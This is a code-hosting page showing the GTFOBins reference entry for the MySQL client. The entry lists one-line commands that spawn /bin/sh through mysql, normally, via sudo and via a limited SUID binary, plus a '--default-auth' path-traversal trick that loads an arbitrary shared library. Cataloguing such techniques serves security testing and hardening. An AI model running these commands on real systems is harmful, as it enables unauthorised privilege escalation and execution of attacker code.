This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
4a058f88e163ac5053f09042f21e8b4d3b462d51
GTFOBins.github.io
/
_gtfobins
/
mysql.md
Andrea Cardaci
13ab3596bb
Add MySQL library-load
2019-03-25 19:40:48 +01:00
451 B
Raw
Blame
History
description, functions
description
functions
A valid MySQL server must be available.
shell
sudo
limited-suid
library-load
code
mysql -e '! /bin/sh'
code
sudo mysql -e '! /bin/sh'
code
./mysql -e '! /bin/sh'
description
code
A MySQL server must accept connections in order for this to work. The following loads the `/path/to/lib.so` shared object.
mysql --default-auth ../../../../../path/to/lib
Reference in New Issue
View Git Blame
Copy Permalink